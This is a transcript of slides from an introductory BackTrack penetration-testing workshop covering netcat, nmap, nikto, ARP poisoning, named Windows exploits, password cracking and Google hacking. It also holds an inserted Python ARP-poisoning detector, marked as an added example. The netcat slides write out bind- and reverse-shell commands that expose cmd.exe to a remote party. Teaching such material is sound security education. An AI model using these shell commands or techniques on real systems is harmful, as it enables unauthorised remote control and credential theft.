<< back | track 3 Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk.

Presentation transcript:

Introduction to BackTrack
Local boot to remote root in just one CD
Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk
Kunal Sehgal

Introduction:
- BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux operating system, all wrapped up on a bootable (live) CD
- The top-rated Linux live distribution focused on penetration testing
- Consists of more than 300 different up-to-date tools, logically structured according to the workflow of security professionals
- Rated #1 Security-Distro by insecure.org & sectools.org

Miscellaneous BT Services:
- HTTP (Port: 80)
- TFTP (Port: 69)
- SSH (Port: 22)
- VNC (Port: 5901)

Netcat:
- A computer networking utility for reading from and writing to network connections on either TCP or UDP
- Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections
- Bind Shell
- Reverse Shell

Bind Shell:
[Diagram: Attacker (Private IP) behind NAT, Internet, Victim (Public IP)]
Commands shown on the slide: nc -lvp e cmd.exe / nc -v 4444
Attacker connects to Victim (Incoming Traffic)

Reverse Shell:
[Diagram: Attacker (Public IP), Internet, Victim (Private IP) behind NAT]
Commands shown on the slide: nc -v e cmd.exe / nc -lvp 4444
Victim sends the shell (Outgoing Traffic)

Nmap:
- A security scanner used to discover computers and services on a computer network, thus creating a "map" of the network
- Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves
- May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.

Nikto:
- A scanner which performs comprehensive tests against web servers for multiple items
- Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers
- Not every check is a security problem, though most are
- There are some items that are "info only" type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server

ARP Poisoning – Man In The Middle Attack:
- MAC Address: Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification
- Address Resolution Protocol (ARP): A method for finding a host's hardware address when only its Network Layer address is known
- Ettercap: A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks

Network Using A Hub:
[Diagram: Attacker, Sender, Receiver]
Can easily sniff data

Network Using A Switch:
[Diagram: Attacker, Sender, Receiver]
Cannot sniff any data :(

Man In The Middle Attack:
[Diagram: Attacker, Sender, Receiver]
Hi everyone, I’m the switch
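From the defender's side, the ARP poisoning described in the slides above shows up as IP-to-MAC bindings that change or collide. The following is an added example, not part of the original presentation: a small detector run over constructed ARP reply observations. All addresses, the function name and the alert names are assumptions made for the illustration.

```python
from collections import defaultdict

# Constructed sample: (timestamp, sender IP, sender MAC) taken from ARP replies.
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.1.1", "00:11:22:33:44:55"),    # gateway, real MAC
    (1.2, "192.168.1.20", "aa:bb:cc:00:00:20"),
    (1.5, "192.168.1.30", "de:ad:be:ef:00:30"),
    (9.0, "192.168.1.1", "de:ad:be:ef:00:30"),    # gateway IP now claimed by .30's MAC
    (9.1, "192.168.1.20", "de:ad:be:ef:00:30"),   # same MAC also claims .20
    (12.0, "192.168.1.20", "aa:bb:cc:00:00:20"),  # real host answers again
]

def detect_arp_poisoning(replies, static_bindings=None):
    """Return a list of (timestamp, kind, detail) alerts.

    static_bindings: optional {ip: mac} of known-good entries (e.g. the gateway).
    """
    static_bindings = static_bindings or {}
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for ts, ip, mac in sorted(replies):
        mac = mac.lower()
        expected = static_bindings.get(ip)
        if expected and mac != expected.lower():
            alerts.append((ts, "static-mismatch",
                           f"{ip} claimed by {mac}, expected {expected}"))
        previous = ip_to_mac.get(ip)
        if previous and previous != mac:
            alerts.append((ts, "binding-changed",
                           f"{ip} moved {previous} -> {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append((ts, "mac-claims-many-ips",
                           f"{mac} claims {sorted(mac_to_ips[mac])}"))
    return alerts

if __name__ == "__main__":
    known_good = {"192.168.1.1": "00:11:22:33:44:55"}
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES, known_good):
        print(alert)
```

A MAC that legitimately answers for several IPs (a router doing proxy ARP, a host with multiple addresses) will also trigger "mac-claims-many-ips", so that alert is best correlated with a binding change on the gateway address.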

Exploits:
- An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur
- Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack
- Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patch-free computer application vulnerabilities

Exploits (Contd.):
[Diagram: Attack / Exploit; Vulnerability (App, Protocol, O/S); Payload (Add a user, Get a remote shell, GUI access, Change routing tables, etc.)]

Exploit Frameworks:
- A development platform for creating security tools and exploits
- Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide
- A boon for script kiddies

Windows DCOM RPC Interface Buffer Overrun:
- Exploits a vulnerability in Windows OS
- The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system
- Bind Shell

IE IsComponentInstalled Buffer Overflow Vulnerability:
- Exploits a vulnerability in an application (MS Internet Explorer)
- Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser
- Reverse Shell

MS Windows Graphics Rendering Engine WMF:
- Exploits a vulnerability in MS Windows WMF graphics rendering engine
- The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file

Passwords Hacking:
Why hack local passwords?
- Install software: key loggers, trojans, etc.
- Gain access to another PC, server, router, etc.
- People re-use passwords all the time
Types of attack:
- Brute Force Attack
- Dictionary Attack
- Rainbow Tables

Password Attack Vectors:
- Online Attack: Attacking network services that require a user to log on, by guessing the correct password
- Offline Attack: Attacking hash files that store encrypted passwords
- Physical Access Attack: Attacking machines and other network devices, after gaining physical access

How To Hack Windows Passwords?
- Available Tools: John The Ripper, Cain & Abel, Rainbow Tables
- Gain access to the victim’s PC

Google Hacking:
- Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results
- In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others

References:
- johnny.ihackstuff.com

Questions??
Feel free to contact me: Kunal Sehgal

Workshop Exercise: